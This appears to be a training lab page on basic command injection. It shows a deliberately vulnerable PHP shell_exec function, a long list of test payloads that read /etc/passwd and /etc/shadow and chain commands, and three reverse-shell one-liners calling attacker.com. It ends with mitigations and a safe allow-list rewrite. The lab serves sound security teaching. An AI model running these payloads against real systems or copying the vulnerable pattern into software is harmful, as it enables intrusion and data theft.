Lab 1: Basic Command Injection

Command injection without proper validation

Difficulty: Low

Lab Overview

This lab demonstrates a basic command injection vulnerability where user input is directly used in system commands without proper validation or sanitization. The application allows execution of arbitrary commands on the server.

Objective: Inject and execute arbitrary commands to achieve code execution and information disclosure.

Vulnerable Code
// Vulnerable: Direct execution without validation
function execute_command($command) {
    if (empty($command)) {
        return "No command specified.";
    }
    
    // Vulnerable: Direct execution using shell_exec
    $output = @shell_exec($command . ' 2>&1');
    
    if ($output === null) {
        return "Command execution failed or no output.";
    }
    
    return $output;
}

Command Execution
Available Commands

Try these basic commands:

  • whoami - Current user
  • id - User ID information
  • pwd - Current directory
  • ls - List files
  • uname -a - System information

Vulnerability Details
  • Type: Command Injection
  • Severity: High
  • Method: POST
  • Issue: Direct command execution without validation

Test Payloads
  • whoami - Basic command
  • id; ls - Multiple commands
  • cat /etc/passwd - File reading
  • ps aux - Process listing

Command Injection Payloads

Use these payloads to test the command injection vulnerability:

1. Basic Information Gathering:
   whoami
   id
   pwd
   uname -a
   hostname
   date
2. File System Access:
   ls -la
   cat /etc/passwd
   cat /etc/hosts
   cat /etc/shadow
   cat /proc/version
   cat /proc/cpuinfo
3. Process and System Information:
   ps aux
   ps -ef
   netstat -an
   ss -tuln
   lsof -i
   df -h
   free -m
4. Network Information:
   ifconfig
   ip addr
   route -n
   arp -a
   nslookup google.com
   ping -c 3 8.8.8.8
5. User and Permission Information:
   groups
   sudo -l
   crontab -l
   history
   env
   printenv
6. Multiple Command Execution:
   whoami; id; pwd
   ls -la; cat /etc/passwd
   ps aux; netstat -an
   whoami && id && pwd
   whoami || id || pwd
7. Command Substitution:
   echo $(whoami)
   echo `id`
   echo $(cat /etc/passwd)
   echo `ls -la`
8. Pipe and Redirection:
   whoami | cat
   id > /tmp/output.txt
   ls -la | grep php
   cat /etc/passwd | head -5
9. Environment Variables:
   echo $PATH
   echo $HOME
   echo $USER
   echo $SHELL
   echo $PWD
10. File Operations:
   touch /tmp/test.txt
   echo "test" > /tmp/test.txt
   cat /tmp/test.txt
   rm /tmp/test.txt
   mkdir /tmp/testdir
   rmdir /tmp/testdir
11. Advanced Commands:
   find / -name "*.php" 2>/dev/null
   grep -r "password" /var/www/ 2>/dev/null
   find / -perm -4000 2>/dev/null
   find / -writable 2>/dev/null
12. Reverse Shell (Dangerous):
   bash -i >& /dev/tcp/attacker.com/4444 0>&1
   nc -e /bin/bash attacker.com 4444
   python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("attacker.com",4444));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'

Real-World Attack Scenarios

Mitigation Strategies
  • Implement proper input validation and sanitization
  • Use whitelist-based command validation
  • Avoid direct command execution functions
  • Use parameterized commands and safe APIs
  • Implement proper access controls and permissions
  • Regular security testing and vulnerability assessments
  • Monitor for unusual command execution patterns
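As an added example (not the lab's own code), here is an allow-list replacement for execute_command() that applies the whitelist and safe-API mitigations above: the request may only name one of the lab's Available Commands, each mapped to a fixed argument vector and run through proc_open() without a shell. The POST parameter name "command" and PHP 7.4 or later are assumptions.

```php
<?php
// Added example, not the lab's own code: an allow-list replacement for
// execute_command(). The client chooses a command *name*; the argv for that
// name is fixed here, so request data never reaches a shell.

// The lab's "Available Commands" only, each as a fixed argument vector.
const ALLOWED_COMMANDS = [
    'whoami' => ['whoami'],
    'id'     => ['id'],
    'pwd'    => ['pwd'],
    'ls'     => ['ls'],
    'uname'  => ['uname', '-a'],
];

function execute_allowed_command(string $name): string
{
    // Exact-match lookup: "id; ls", "$(whoami)" or "whoami | cat" are simply
    // not keys, so no metacharacter filtering is needed or attempted.
    if (!array_key_exists($name, ALLOWED_COMMANDS)) {
        return "Command not permitted.";
    }

    $descriptors = [
        0 => ['file', '/dev/null', 'r'], // no stdin
        1 => ['pipe', 'w'],              // capture stdout
        2 => ['pipe', 'w'],              // capture stderr (the lab used 2>&1)
    ];

    // An array command (PHP >= 7.4) is executed directly, without /bin/sh,
    // so ';', '&&', '|', '$()' and backticks carry no meaning here.
    $proc = proc_open(ALLOWED_COMMANDS[$name], $descriptors, $pipes);
    if (!is_resource($proc)) {
        return "Command execution failed.";
    }

    $output = stream_get_contents($pipes[1]) . stream_get_contents($pipes[2]);
    fclose($pipes[1]);
    fclose($pipes[2]);
    proc_close($proc);

    return $output === '' ? "No output." : $output;
}

// Same request shape as the lab (POST); the parameter name is assumed.
if (isset($_POST['command'])) {
    header('Content-Type: text/plain');
    echo execute_allowed_command((string) $_POST['command']);
}
```

Every payload from the lists above except the five bare names is rejected before any process is started, and a rejected name is a useful event to log for the monitoring bullet.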